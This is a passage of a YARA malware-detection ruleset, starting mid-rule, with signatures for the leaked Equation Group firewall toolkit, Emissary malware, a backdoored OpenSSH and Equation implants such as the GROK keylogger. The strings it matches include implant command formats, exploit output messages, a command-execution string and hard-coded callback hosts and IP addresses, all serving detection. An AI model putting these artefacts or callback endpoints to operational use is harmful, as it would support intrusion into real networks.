--implant %s --bsize %hu --logdir %s --lptimeout %u" fullword ascii $x2 = "%s -c <cmdtype> -l <lp> -i <implant> -k <ikey> -s <port> -d <port> [operation] [options]" fullword ascii $x3 = "* [%lu] 0x%x is marked as stateless (the module will be persisted without its configuration)" fullword ascii $x4 = "%s version %s already has persistence installed. If you want to uninstall," fullword ascii $x5 = "The active module(s) on the target are not meant to be persisted" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 6000KB and 1 of them ) or ( 3 of them ) } rule EQGRP_Implants_Gen6 { meta: description = "EQGRP Toolset Firewall - from files BananaUsurper-2120, BLIAR-2110, BLIQUER-2230, BLIQUER-3030, BLIQUER-3120, BPICKER-3100, writeJetPlow-2130" author = "Florian Roth" reference = "Research" date = "2016-08-16" super_rule = 1 hash1 = "3366b4bbf265716869a487203a8ac39867920880990493dd4dd8385e42b0c119" hash2 = "05031898f3d52a5e05de119868c0ec7caad3c9f3e9780e12f6f28b02941895a4" hash3 = "d9756e3ba272cd4502d88f4520747e9e69d241dee6561f30423840123c1a7939" hash4 = "8e4a76c4b50350b67cabbb2fed47d781ee52d8d21121647b0c0356498aeda2a2" hash5 = "6059bec5cf297266079d52dbb29ab9b9e0b35ce43f718022b5b5f760c1976ec3" hash6 = "d859ce034751cac960825268a157ced7c7001d553b03aec54e6794ff66185e6f" hash7 = "464b4c01f93f31500d2d770360d23bdc37e5ad4885e274a629ea86b2accb7a5c" strings: $s1 = "LP.c:pixSecurity - Improper number of bytes read in Security/Interface Information" fullword ascii $s2 = "LP.c:pixSecurity - Not in Session" fullword ascii $s3 = "getModInterface__preloadedModules" fullword ascii $s4 = "showCommands" fullword ascii $s5 = "readModuleInterface" fullword ascii $s6 = "Wrapping_Not_Necessary_Or_Wrapping_Ok" fullword ascii $s7 = "Get_CMD_List" fullword ascii $s8 = "LP_Listen2" fullword ascii $s9 = "killCmdList" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 6000KB and all of them ) } rule EQGRP_Implants_Gen5 { meta: description = "EQGRP Toolset Firewall - from 
files BananaUsurper-2120, BARPUNCH-3110, BLIAR-2110, BLIQUER-2230, BLIQUER-3030, BLIQUER-3120, BPICKER-3100, writeJetPlow-2130" author = "Florian Roth" reference = "Research" date = "2016-08-16" super_rule = 1 hash1 = "3366b4bbf265716869a487203a8ac39867920880990493dd4dd8385e42b0c119" hash2 = "830538fe8c981ca386c6c7d55635ac61161b23e6e25d96280ac2fc638c2d82cc" hash3 = "05031898f3d52a5e05de119868c0ec7caad3c9f3e9780e12f6f28b02941895a4" hash4 = "d9756e3ba272cd4502d88f4520747e9e69d241dee6561f30423840123c1a7939" hash5 = "8e4a76c4b50350b67cabbb2fed47d781ee52d8d21121647b0c0356498aeda2a2" hash6 = "6059bec5cf297266079d52dbb29ab9b9e0b35ce43f718022b5b5f760c1976ec3" hash7 = "d859ce034751cac960825268a157ced7c7001d553b03aec54e6794ff66185e6f" hash8 = "464b4c01f93f31500d2d770360d23bdc37e5ad4885e274a629ea86b2accb7a5c" strings: $x1 = "Module and Implant versions do not match. This module is not compatible with the target implant" fullword ascii $s1 = "%s/BF_READ_%08x_%04d%02d%02d_%02d%02d%02d.log" fullword ascii $s2 = "%s/BF_%04d%02d%02d.log" fullword ascii $s3 = "%s/BF_READ_%08x_%04d%02d%02d_%02d%02d%02d.bin" fullword ascii condition: ( uint16(0) == 0x457f and 1 of ($x*) ) or ( all of them ) } rule EQGRP_pandarock { meta: description = "EQGRP Toolset Firewall - from files pandarock_v1.11.1.1.bin, pit" author = "Florian Roth" reference = "Research" date = "2016-08-16" super_rule = 1 hash1 = "1214e282ac7258e616ebd76f912d4b2455d1b415b7216823caa3fc0d09045a5f" hash2 = "c8a151df7605cb48feb8be2ab43ec965b561d2b6e2a837d645fdf6a6191ab5fe" strings: $x1 = "* Not attempting to execute \"%s\" command" fullword ascii $x2 = "TERMINATING SCRIPT (command error or \"quit\" encountered)" fullword ascii $x3 = "execute code in <file> passing <argX> (HEX)" fullword ascii $x4 = "* Use arrow keys to scroll through command history" fullword ascii $s1 = "pitCmd_processCmdLine" fullword ascii $s2 = "execute all commands in <file>" fullword ascii $s3 = "__processShellCmd" fullword ascii $s4 = 
"pitTarget_getDstPort" fullword ascii $s5 = "__processSetTargetIp" fullword ascii $o1 = "Logging commands and output - ON" fullword ascii $o2 = "This command is too dangerous. If you'd like to run it, contact the development team" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 3000KB and 1 of ($x*) ) or ( 4 of them ) or 1 of ($o*) } rule EQGRP_BananaUsurper_writeJetPlow { meta: description = "EQGRP Toolset Firewall - from files BananaUsurper-2120, writeJetPlow-2130" author = "Florian Roth" reference = "Research" date = "2016-08-16" super_rule = 1 hash1 = "3366b4bbf265716869a487203a8ac39867920880990493dd4dd8385e42b0c119" hash2 = "464b4c01f93f31500d2d770360d23bdc37e5ad4885e274a629ea86b2accb7a5c" strings: $x1 = "Implant Version-Specific Values:" fullword ascii $x2 = "This function should not be used with a Netscreen, something has gone horribly wrong" fullword ascii $s1 = "createSendRecv: recv'd an error from the target." fullword ascii $s2 = "Error: WatchDogTimeout read returned %d instead of 4" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 2000KB and 1 of ($x*) ) or ( 3 of them ) } rule EQGRP_Implants_Gen4 { meta: description = "EQGRP Toolset Firewall - from files BLIAR-2110, BLIQUER-2230, BLIQUER-3030, BLIQUER-3120" author = "Florian Roth" reference = "Research" date = "2016-08-16" super_rule = 1 hash1 = "05031898f3d52a5e05de119868c0ec7caad3c9f3e9780e12f6f28b02941895a4" hash2 = "d9756e3ba272cd4502d88f4520747e9e69d241dee6561f30423840123c1a7939" hash3 = "8e4a76c4b50350b67cabbb2fed47d781ee52d8d21121647b0c0356498aeda2a2" hash4 = "6059bec5cf297266079d52dbb29ab9b9e0b35ce43f718022b5b5f760c1976ec3" strings: $s1 = "Command has not yet been coded" fullword ascii $s2 = "Beacon Domain : www.%s.com" fullword ascii $s3 = "This command can only be run on a PIX/ASA" fullword ascii $s4 = "Warning! Bad or missing Flash values (in section 2 of .dat file)" fullword ascii $s5 = "Printing the interface info and security levels. PIX ONLY." 
fullword ascii condition: ( uint16(0) == 0x457f and filesize < 3000KB and 3 of them ) or ( all of them ) } rule EQGRP_Implants_Gen3 { meta: description = "EQGRP Toolset Firewall - from files BARPUNCH-3110, BLIAR-2110, BLIQUER-2230, BLIQUER-3030, BLIQUER-3120, BPICKER-3100" author = "Florian Roth" reference = "Research" date = "2016-08-16" super_rule = 1 hash1 = "830538fe8c981ca386c6c7d55635ac61161b23e6e25d96280ac2fc638c2d82cc" hash2 = "05031898f3d52a5e05de119868c0ec7caad3c9f3e9780e12f6f28b02941895a4" hash3 = "d9756e3ba272cd4502d88f4520747e9e69d241dee6561f30423840123c1a7939" hash4 = "8e4a76c4b50350b67cabbb2fed47d781ee52d8d21121647b0c0356498aeda2a2" hash5 = "6059bec5cf297266079d52dbb29ab9b9e0b35ce43f718022b5b5f760c1976ec3" hash6 = "d859ce034751cac960825268a157ced7c7001d553b03aec54e6794ff66185e6f" strings: $x1 = "incomplete and must be removed manually.)" fullword ascii $s1 = "%s: recv'd an error from the target." fullword ascii $s2 = "Unable to fetch the address to the get_uptime_secs function for this OS version" fullword ascii $s3 = "upload/activate/de-activate/remove/cmd function failed" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 6000KB and 2 of them ) or ( all of them ) } rule EQGRP_BLIAR_BLIQUER { meta: description = "EQGRP Toolset Firewall - from files BLIAR-2110, BLIQUER-2230" author = "Florian Roth" reference = "Research" date = "2016-08-16" super_rule = 1 hash1 = "05031898f3d52a5e05de119868c0ec7caad3c9f3e9780e12f6f28b02941895a4" hash2 = "d9756e3ba272cd4502d88f4520747e9e69d241dee6561f30423840123c1a7939" strings: $x1 = "Do you wish to activate the implant that is already on the firewall? (y/n): " fullword ascii $x2 = "There is no implant present on the firewall." fullword ascii $x3 = "Implant Version :%lx%lx%lx" fullword ascii $x4 = "You may now connect to the implant using the pbd idkey" fullword ascii $x5 = "No reply from persistant back door." 
fullword ascii $x6 = "rm -rf pbd.wc; wc -c %s > pbd.wc" fullword ascii $p1 = "PBD_GetVersion" fullword ascii $p2 = "pbd/pbdEncrypt.bin" fullword ascii $p3 = "pbd/pbdGetVersion.pkt" fullword ascii $p4 = "pbd/pbdStartWrite.bin" fullword ascii $p5 = "pbd/pbd_setNewHookPt.pkt" fullword ascii $p6 = "pbd/pbd_Upload_SinglePkt.pkt" fullword ascii $s1 = "Unable to fetch hook and jmp addresses for this OS version" fullword ascii $s2 = "Could not get hook and jump addresses" fullword ascii $s3 = "Enter the name of a clean implant binary (NOT an image):" fullword ascii $s4 = "Unable to read dat file for OS version 0x%08lx" fullword ascii $s5 = "Invalid implant file" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 3000KB and ( 1 of ($x*) or 1 of ($p*) ) ) or ( 3 of them ) } rule EQGRP_sploit { meta: description = "EQGRP Toolset Firewall - from files sploit.py, sploit.py" author = "Florian Roth" reference = "Research" date = "2016-08-16" super_rule = 1 hash1 = "0316d70a5bbf068a7fc791e08e816015d04ec98f088a7ff42af8b9e769b8d1f6" hash2 = "0316d70a5bbf068a7fc791e08e816015d04ec98f088a7ff42af8b9e769b8d1f6" strings: $s1 = "print \"[+] Connecting to %s:%s\" % (self.params.dst['ip'], self.params.dst['port'])" fullword ascii $s2 = "@overridable(\"Must be overriden if the target will be touched. Base implementation should not be called.\")" fullword ascii $s3 = "@overridable(\"Must be overriden. 
Base implementation should not be called.\")" fullword ascii $s4 = "exp.load_vinfo()" fullword ascii $s5 = "if not okay and self.terminateFlingOnException:" fullword ascii $s6 = "print \"[-] keyboard interrupt before response received\"" fullword ascii $s7 = "if self.terminateFlingOnException:" fullword ascii $s8 = "print 'Debug info ','='*40" fullword ascii condition: ( uint16(0) == 0x2123 and filesize < 90KB and 1 of ($s*) ) or ( 4 of them ) } rule EQGRP_Implants_Gen2 { meta: description = "EQGRP Toolset Firewall - from files BananaUsurper-2120, BLIAR-2110, BLIQUER-2230, BLIQUER-3030, BLIQUER-3120, writeJetPlow-2130" author = "Florian Roth" reference = "Research" date = "2016-08-16" super_rule = 1 hash1 = "3366b4bbf265716869a487203a8ac39867920880990493dd4dd8385e42b0c119" hash2 = "05031898f3d52a5e05de119868c0ec7caad3c9f3e9780e12f6f28b02941895a4" hash3 = "d9756e3ba272cd4502d88f4520747e9e69d241dee6561f30423840123c1a7939" hash4 = "8e4a76c4b50350b67cabbb2fed47d781ee52d8d21121647b0c0356498aeda2a2" hash5 = "6059bec5cf297266079d52dbb29ab9b9e0b35ce43f718022b5b5f760c1976ec3" hash6 = "464b4c01f93f31500d2d770360d23bdc37e5ad4885e274a629ea86b2accb7a5c" strings: $x1 = "Modules persistence file written successfully" fullword ascii $x2 = "Modules persistence data successfully removed" fullword ascii $x3 = "No Modules are active on the firewall, nothing to persist" fullword ascii $s1 = "--cmd %x --idkey %s --sport %i --dport %i --lp %s --implant %s --bsize %hu --logdir %s " fullword ascii $s2 = "Error while attemping to persist modules:" fullword ascii $s3 = "Error while reading interface info from PIX" fullword ascii $s4 = "LP.c:pixFree - Failed to get response" fullword ascii $s5 = "WARNING: LP Timeout specified (%lu seconds) less than default (%u seconds). 
Setting default" fullword ascii $s6 = "Unable to fetch config address for this OS version" fullword ascii $s7 = "LP.c: interface information not available for this session" fullword ascii $s8 = "[%s:%s:%d] ERROR: " fullword ascii $s9 = "extract_fgbg" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 3000KB and 1 of ($x*) ) or ( 5 of them ) } rule EQGRP_Implants_Gen1 { meta: description = "EQGRP Toolset Firewall - from files BananaUsurper-2120, BARPUNCH-3110, BLIAR-2110, BLIQUER-2230, BLIQUER-3030, BLIQUER-3120, BPICKER-3100, lpexe, writeJetPlow-2130" author = "Florian Roth" reference = "Research" date = "2016-08-16" super_rule = 1 hash1 = "3366b4bbf265716869a487203a8ac39867920880990493dd4dd8385e42b0c119" hash2 = "830538fe8c981ca386c6c7d55635ac61161b23e6e25d96280ac2fc638c2d82cc" hash3 = "05031898f3d52a5e05de119868c0ec7caad3c9f3e9780e12f6f28b02941895a4" hash4 = "d9756e3ba272cd4502d88f4520747e9e69d241dee6561f30423840123c1a7939" hash5 = "8e4a76c4b50350b67cabbb2fed47d781ee52d8d21121647b0c0356498aeda2a2" hash6 = "6059bec5cf297266079d52dbb29ab9b9e0b35ce43f718022b5b5f760c1976ec3" hash7 = "d859ce034751cac960825268a157ced7c7001d553b03aec54e6794ff66185e6f" hash8 = "ee3e3487a9582181892e27b4078c5a3cb47bb31fc607634468cc67753f7e61d7" hash9 = "464b4c01f93f31500d2d770360d23bdc37e5ad4885e274a629ea86b2accb7a5c" strings: $s1 = "WARNING: Session may not have been closed!" fullword ascii $s2 = "EXEC Packet Processed" fullword ascii $s3 = "Failed to insert the command into command list." fullword ascii $s4 = "Send_Packet: Trying to send too much data." fullword ascii $s5 = "payloadLength >= MAX_ALLOW_SIZE." fullword ascii $s6 = "Wrong Payload Size" fullword ascii $s7 = "Unknown packet received......" 
fullword ascii $s8 = "Returned eax = %08x" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 6000KB and ( 2 of ($s*) ) ) or ( 5 of them ) } rule EQGRP_eligiblebombshell_generic { meta: description = "EQGRP Toolset Firewall - from files eligiblebombshell_1.2.0.1.py, eligiblebombshell_1.2.0.1.py" author = "Florian Roth" reference = "Research" date = "2016-08-16" super_rule = 1 hash1 = "dd0e3ae6e1039a755bf6cb28bf726b4d6ab4a1da2392ba66d114a43a55491eb1" hash2 = "dd0e3ae6e1039a755bf6cb28bf726b4d6ab4a1da2392ba66d114a43a55491eb1" strings: $s1 = "logging.error(\" Perhaps you should run with --scan?\")" fullword ascii $s2 = "logging.error(\"ERROR: No entry for ETag [%s] in %s.\" %" fullword ascii $s3 = "\"be supplied\")" fullword ascii condition: ( filesize < 70KB and 2 of ($s*) ) or ( all of them ) } rule EQGRP_ssh_telnet_29 { meta: description = "EQGRP Toolset Firewall - from files ssh.py, telnet.py" author = "Florian Roth" reference = "Research" date = "2016-08-16" super_rule = 1 hash1 = "630d464b1d08c4dfd0bd50552bee2d6a591fb0b5597ecebaa556a3c3d4e0aa4e" hash2 = "07f4c60505f4d5fb5c4a76a8c899d9b63291444a3980d94c06e1d5889ae85482" strings: $s1 = "received prompt, we're in" fullword ascii $s2 = "failed to login, bad creds, abort" fullword ascii $s3 = "sending command \" + str(n) + \"/\" + str(tot) + \", len \" + str(len(chunk) + " fullword ascii $s4 = "received nat - EPBA: ok, payload: mangled, did not run" fullword ascii $s5 = "no status returned from target, could be an exploit failure, or this is a version where we don't expect a stus return" ascii $s6 = "received arp - EPBA: ok, payload: fail" fullword ascii $s7 = "chopped = string.rstrip(payload, \"\\x0a\")" fullword ascii condition: ( filesize < 10KB and 2 of them ) or ( 3 of them ) } /* Extras */ rule EQGRP_tinyexec { meta: description = "EQGRP Toolset Firewall - from files tinyexec" author = "Florian Roth" reference = "Research" date = "2016-08-16" strings: $s1 = { 73 68 73 74 72 74 61 62 00 2E 74 65 78 74 
} $s2 = { 5A 58 55 52 89 E2 55 50 89 E1 }
   condition:
      uint32(0) == 0x464c457f and filesize < 270 and all of them
}

rule EQGRP_callbacks {
   meta:
      description = "EQGRP Toolset Firewall - Callback addresses"
      author = "Florian Roth"
      reference = "Research"
      date = "2016-08-16"
   strings:
      /* Hard-coded callback endpoint (IP:port) found in the leaked tooling;
         the original "DoD" tag presumably refers to 30.0.0.0/8 being
         DoD-registered address space. A bare IP:port literal also appears
         in threat-intel reports, IOC lists and this ruleset itself, so
         expect (and triage) hits on documents as well as binaries. */
      $s1 = "30.40.50.60:9342" fullword ascii wide /* DoD */
   condition:
      1 of them
}

rule EQGRP_Extrabacon_Output {
   meta:
      description = "EQGRP Toolset Firewall - Extrabacon exploit output"
      author = "Florian Roth"
      reference = "Research"
      date = "2016-08-16"
   strings:
      /* Status messages printed by the EXTRABACON tool. Being output
         strings, they match the exploit's own source (where the prints
         live) as well as any captured operator transcript or log file.
         "|###[ ... ]###" is the layout of a scapy packet dump, and
         "pass-disable" appears to be the mode that disables password
         checking on the target (cf. "To disable password checking on
         target:" in EQGRP_extrabacon). */
      $s1 = "|###[ SNMPresponse ]###" fullword ascii
      $s2 = "[+] generating exploit for exec mode pass-disable" fullword ascii
      $s3 = "[+] building payload for mode pass-disable" fullword ascii
      $s4 = "[+] Executing: extrabacon" fullword ascii
      $s5 = "appended AAAADMINAUTH_ENABLE payload" fullword ascii
   condition:
      /* Two co-occurring messages; no file-header gate, so plain-text
         logs are in scope by design. */
      2 of them
}

rule EQGRP_Unique_Strings {
   meta:
      description = "EQGRP Toolset Firewall - Unique strings"
      author = "Florian Roth"
      reference = "Research"
      date = "2016-08-16"
   strings:
      /* Directory-layout fragment of the toolkit (cf. the
         /current/bin/FW/BANANAGLEE/... paths in the jetplow rules). */
      $s1 = "/BananaGlee/ELIGIBLEBOMB" ascii
      /* No modifier given, so YARA's default (ascii, not fullword)
         applies; a UTF-16 copy of this message would not match. */
      $s2 = "Protocol must be either http or https (Ex: https://1.2.3.4:1234)"
   condition:
      1 of them
}

rule EQGRP_RC5_RC6_Opcode {
   meta:
      description = "EQGRP Toolset Firewall - RC5 / RC6 opcode"
      author = "Florian Roth"
      reference = "https://securelist.com/blog/incidents/75812/the-equation-giveaway/"
      date = "2016-08-17"
   strings:
      /* x86 key-schedule initialisation loop (S[i] = S[i-1] + Q):
            8B 74 91 FC          mov  esi, [ecx+edx*4-4]   ; S[i-1]
            81 EE 47 86 C8 61    sub  esi, 61C88647h       ; == add 9E3779B9h
            89 34 91             mov  [ecx+edx*4], esi     ; S[i]
            42                   inc  edx
            83 FA 2B             cmp  edx, 2Bh             ; loop bound 43
         0x61C88647 + 0x9E3779B9 == 2^32, so the subtraction adds the
         RC5/RC6 constant Q = 0x9E3779B9 (the golden-ratio constant).
         NOTE(review): a bound of 43 is consistent with RC6's 2r+4 = 44-word
         schedule at r = 20 (RC5-12 would use 26 words), assuming the jump
         that follows is a less-or-equal - confirm in the sample. Q on its
         own is shared with TEA/XTEA and Fibonacci hashing, so the match
         relies on the whole compiled sequence; a rebuild with different
         register allocation or round count will not hit this pattern. */
      $s1 = { 8B 74 91 FC 81 EE 47 86 C8 61 89 34 91 42 83 FA 2B }
   condition:
      /* No PE/ELF or size gate: the opcode sequence is accepted anywhere,
         including memory dumps. */
      1 of them
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. 
*/ /* Yara Rule Set Author: Florian Roth Date: 2016-01-02 Identifier: Emissary Malware */ rule Emissary_APT_Malware_1 { meta: description = "Detect Emissary Malware - from samples A08E81B411.DAT, ishelp.dll" author = "Florian Roth" reference = "http://goo.gl/V0epcf" date = "2016-01-02" score = 75 hash1 = "9420017390c598ee535c24f7bcbd39f40eca699d6c94dc35bcf59ddf918c59ab" hash2 = "70561f58c9e5868f44169854bcc906001947d98d15e9b4d2fbabd1262d938629" hash3 = "0e64e68f6f88b25530699a1cd12f6f2790ea98e6e8fa3b4bc279f8e5c09d7290" hash4 = "69caa2a4070559d4cafdf79020c4356c721088eb22398a8740dea8d21ae6e664" hash5 = "675869fac21a94c8f470765bc6dd15b17cc4492dd639b878f241a45b2c3890fc" hash6 = "e817610b62ccd00bdfc9129f947ac7d078d97525e9628a3aa61027396dba419b" hash7 = "a8b0d084949c4f289beb4950f801bf99588d1b05f68587b245a31e8e82f7a1b8" hash8 = "acf7dc5a10b00f0aac102ecd9d87cd94f08a37b2726cb1e16948875751d04cc9" hash9 = "e21b47dfa9e250f49a3ab327b7444902e545bed3c4dcfa5e2e990af20593af6d" hash10 = "e369417a7623d73346f6dff729e68f7e057f7f6dae7bb03d56a7510cb3bfe538" hash11 = "29d8dc863427c8e37b75eb738069c2172e79607acc7b65de6f8086ba36abf051" hash12 = "98fb1d2975babc18624e3922406545458642e01360746870deee397df93f50e0" hash13 = "fbcb401cf06326ab4bb53fb9f01f1ca647f16f926811ea66984f1a1b8cf2f7bb" strings: $s1 = "cmd.exe /c %s > %s" fullword ascii $s2 = "execute cmd timeout." fullword ascii $s3 = "rundll32.exe \"%s\",Setting" fullword ascii $s4 = "DownloadFile - exception:%s." fullword ascii $s5 = "CDllApp::InitInstance() - Evnet create successful." fullword ascii $s6 = "UploadFile - EncryptBuffer Error" fullword ascii $s7 = "WinDLL.dll" fullword wide $s8 = "DownloadFile - exception:%s,code:0x%08x." fullword ascii $s9 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" fullword ascii $s10 = "CDllApp::InitInstance() - Evnet already exists." 
fullword ascii
   condition:
      uint16(0) == 0x5a4d and filesize < 250KB and 3 of them
}

rule Backdoored_ssh {
   meta:
      author = "Kaspersky"
      reference = "https://securelist.com/energetic-bear-crouching-yeti/85345/"
      actor = "Energetic Bear/Crouching Yeti"
   strings:
      /* All three are plain ascii substrings (no fullword / wide). */
      $a1 = "OpenSSH"
      /* Not fullword, so this is also a substring of "usage: sshd": a
         trojanised daemon satisfies it as well as a client binary. */
      $a2 = "usage: ssh"
      /* NOTE(review): presumably the discriminator - the other two strings
         occur in any OpenSSH build. Confirm HISTFILE is absent from a clean
         binary of the same version before treating a hit as conclusive. */
      $a3 = "HISTFILE"
   condition:
      /* ELF magic (7F 45 4C 46 read little-endian) and under ~1 MB. */
      uint32(0) == 0x464c457f and filesize<1000000 and all of ($a*)
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */

/* Re-imported here because this file concatenates several independently
   published rulesets; YARA accepts a repeated import of the same module. */
import "pe"

/* Equation APT ------------------------------------------------------------ */

rule apt_equation_exploitlib_mutexes {
   meta:
      copyright = "Kaspersky Lab"
      description = "Rule to detect Equation group's Exploitation library http://goo.gl/ivt8EW"
      version = "1.0"
      last_modified = "2015-02-16"
      reference = "http://securelist.com/blog/research/68750/equation-the-death-star-of-malware-galaxy/"
   strings:
      /* "$mz at 0" is the PE gate (same effect as uint16(0) == 0x5a4d). */
      $mz="MZ"
      /* Object names (mutexes, per the rule name) used by the exploitation
         library, as UTF-16LE ("wide") and, for two of them, also ascii. */
      $a1="prkMtx" wide
      $a2="cnFormSyncExFBC" wide
      $a3="cnFormVoidFBC" wide
      $a4="cnFormSyncExFBC"
      $a5="cnFormVoidFBC"
   condition:
      /* A single name suffices. None is fullword, so the six-character
         "prkMtx" in particular can occur inside unrelated UTF-16 data -
         review hits on large generic binaries. */
      (($mz at 0) and any of ($a*))
}

rule apt_equation_doublefantasy_genericresource {
   meta:
      copyright = "Kaspersky Lab"
      description = "Rule to detect DoubleFantasy encoded config http://goo.gl/ivt8EW"
      version = "1.0"
      last_modified = "2015-02-16"
      reference = "http://securelist.com/blog/research/68750/equation-the-death-star-of-malware-galaxy/"
   strings:
      $mz="MZ"
      /* UTF-16LE "BINRES" preceded by 06 00 - looks like a length-prefixed
         (6 characters) resource name; TODO confirm against the sample's
         resource directory. */
      $a1={06 00 42 00 49 00 4E 00 52 00 45 00 53 00}
      /* Presumably padding inside the encoded config blob the description
         refers to. */
      $a2="yyyyyyyyyyyyyyyy"
      /* Three ascii digits - far too common on its own; it only carries
         weight because the condition requires all three strings. */
      $a3="002"
   condition:
      (($mz at 0) and all of ($a*)) and filesize < 500000
}

rule apt_equation_equationlaser_runtimeclasses {
   meta:
      copyright = "Kaspersky Lab"
      description = "Rule to detect the EquationLaser malware"
      version = "1.0"
      last_modified = "2015-02-16"
      reference = "https://securelist.com/blog/"
   strings:
      $a1="?a73957838_2@@YAXXZ"
      $a2="?a84884@@YAXXZ"
      $a3="?b823838_9839@@YAXXZ"
      $a4="?e747383_94@@YAXXZ"
      $a5="?e83834@@YAXXZ"
      $a6="?e929348_827@@YAXXZ"
   condition: 
any of them
}

// Byte table from the crypto library shared by Equation group samples. The
// condition is the bare table with no header or size gate, so it also fires on
// non-PE files (memory dumps, reports) that embed the table.
rule apt_equation_cryptotable {
    meta:
        copyright = "Kaspersky Lab"
        description = "Rule to detect the crypto library used in Equation group malware"
        version = "1.0"
        last_modified = "2015-02-16"
        reference = "https://securelist.com/blog/"
    strings:
        $a={37 DF E8 B6 C7 9C 0B AE 91 EF F0 3B 90 C6 80 85 5D 19 4B 45 44 12 3C E2 0D 5C 1C 7B C4 FF D6 05 17 14 4F 03 74 1E 41 DA 8F 7D DE 7E 99 F1 35 AC B8 46 93 CE 23 82 07 EB 2B D4 72 71 40 F3 B0 F7 78 D7 4C D1 55 1A 39 83 18 FA E1 9A 56 B1 96 AB A6 30 C5 5F BE 0C 50 C1}
    condition:
        $a
}

/* Equation Group - Kaspersky ---------------------------------------------- */

// TripleFantasy: all $s* artefacts (dropped DLL/DAT names, a Global\ mutex GUID)
// plus either the complete benign-looking $z* set (microsoft/google hosts and a
// local proxy) or one of the $x* host@port strings. $x3/$x4 are not declared
// (numbering gap); "1 of ($x*)" is unaffected by that.
rule Equation_Kaspersky_TripleFantasy_1 {
    meta:
        description = "Equation Group Malware - TripleFantasy http://goo.gl/ivt8EW"
        author = "Florian Roth"
        reference = "http://goo.gl/ivt8EW"
        date = "2015/02/16"
        hash = "b2b2cd9ca6f5864ef2ac6382b7b6374a9fb2cbe9"
    strings:
        $mz = { 4d 5a }
        $s0 = "%SystemRoot%\\system32\\hnetcfg.dll" fullword wide
        $s1 = "%WINDIR%\\System32\\ahlhcib.dll" fullword wide
        $s2 = "%WINDIR%\\sjyntmv.dat" fullword wide
        $s3 = "Global\\{8c38e4f3-591f-91cf-06a6-67b84d8a0102}" fullword wide
        $s4 = "%WINDIR%\\System32\\owrwbsdi" fullword wide
        $s5 = "Chrome" fullword wide
        $s6 = "StringIndex" fullword ascii
        $x1 = "itemagic.net@443" fullword wide
        $x2 = "team4heat.net@443" fullword wide
        $x5 = "62.216.152.69@443" fullword wide
        $x6 = "84.233.205.37@443" fullword wide
        $z1 = "www.microsoft.com@80" fullword wide
        $z2 = "www.google.com@80" fullword wide
        $z3 = "127.0.0.1:3128" fullword wide
    condition:
        ( $mz at 0 ) and filesize < 300000 and (( all of ($s*) and all of ($z*) ) or ( all of ($s*) and 1 of ($x*) ))
}

// DoubleFantasy: the single $z1 format string ("msvcp5%d.dll") is sufficient on
// its own; the alternative path needs the actxprxy export names and most of the
// $x* strings.
rule Equation_Kaspersky_DoubleFantasy_1 {
    meta:
        description = "Equation Group Malware - DoubleFantasy"
        author = "Florian Roth"
        reference = "http://goo.gl/ivt8EW"
        date = "2015/02/16"
        hash = "d09b4b6d3244ac382049736ca98d7de0c6787fa2"
    strings:
        $mz = { 4d 5a }
        $z1 = "msvcp5%d.dll" fullword ascii
        $s0 = "actxprxy.GetProxyDllInfo" fullword ascii
        $s3 =
"actxprxy.DllGetClassObject" fullword ascii
        $s5 = "actxprxy.DllRegisterServer" fullword ascii
        $s6 = "actxprxy.DllUnregisterServer" fullword ascii
        // $x1 is a run of 80 'y' characters without fullword, so it also matches
        // inside longer runs.
        $x1 = "yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy" ascii
        $x2 = "191H1a1" fullword ascii
        $x3 = "November " fullword ascii
        $x4 = "abababababab" fullword ascii
        $x5 = "January " fullword ascii
        $x6 = "October " fullword ascii
        $x7 = "September " fullword ascii
    condition:
        // $z1 alone suffices; otherwise every actxprxy export name plus 6 of the
        // 7 $x* filler/month strings.
        ( $mz at 0 ) and filesize < 350000 and (( $z1 ) or ( all of ($s*) and 6 of ($x*) ))
}

// GROK keylogger driver. Three alternative paths: the user-profile path $s0 on
// its own, the driver name $s1 with 6 of the $x* fragments, or 6 $x* fragments
// together with all three $z* strings (two NT-native registry paths and
// "H.text"; $z3 is not declared).
rule Equation_Kaspersky_GROK_Keylogger {
    meta:
        description = "Equation Group Malware - GROK keylogger"
        author = "Florian Roth"
        reference = "http://goo.gl/ivt8EW"
        date = "2015/02/16"
        hash = "50b8f125ed33233a545a1aac3c9d4bb6aa34b48f"
    strings:
        $mz = { 4d 5a }
        // The same path is $s6 in Equation_Kaspersky_SuspiciousString.
        $s0 = "c:\\users\\rmgree5\\" ascii
        $s1 = "msrtdv.sys" fullword wide
        $x1 = "svrg.pdb" fullword ascii
        $x2 = "W32pServiceTable" fullword ascii
        $x3 = "In forma" fullword ascii
        $x4 = "ReleaseF" fullword ascii
        $x5 = "criptor" fullword ascii
        $x6 = "astMutex" fullword ascii
        $x7 = "ARASATAU" fullword ascii
        $x8 = "R0omp4ar" fullword ascii
        $z1 = "H.text" fullword ascii
        $z2 = "\\registry\\machine\\software\\Microsoft\\Windows NT\\CurrentVersion" fullword wide
        $z4 = "\\registry\\machine\\SYSTEM\\ControlSet001\\Control\\Session Manager\\Environment" wide fullword
    condition:
        ( $mz at 0 ) and filesize < 250000 and ($s0 or ( $s1 and 6 of ($x*) ) or ( 6 of ($x*) and all of ($z*) ))
}

// Grey Fish installer: all three strings required, no header or size gate.
// "Windows Configuration Services" is also $s4 in EquationDrug_PlatformOrchestrator.
rule Equation_Kaspersky_GreyFishInstaller {
    meta:
        description = "Equation Group Malware - Grey Fish"
        author = "Florian Roth"
        reference = "http://goo.gl/ivt8EW"
        date = "2015/02/16"
        hash = "58d15d1581f32f36542f3e9fb4b1fc84d2a6ba35"
    strings:
        $s0 = "DOGROUND.exe" fullword wide
        $s1 = "Windows Configuration Services" fullword wide
        $s2 = "GetMappedFilenameW" fullword ascii
    condition:
        all of them
}

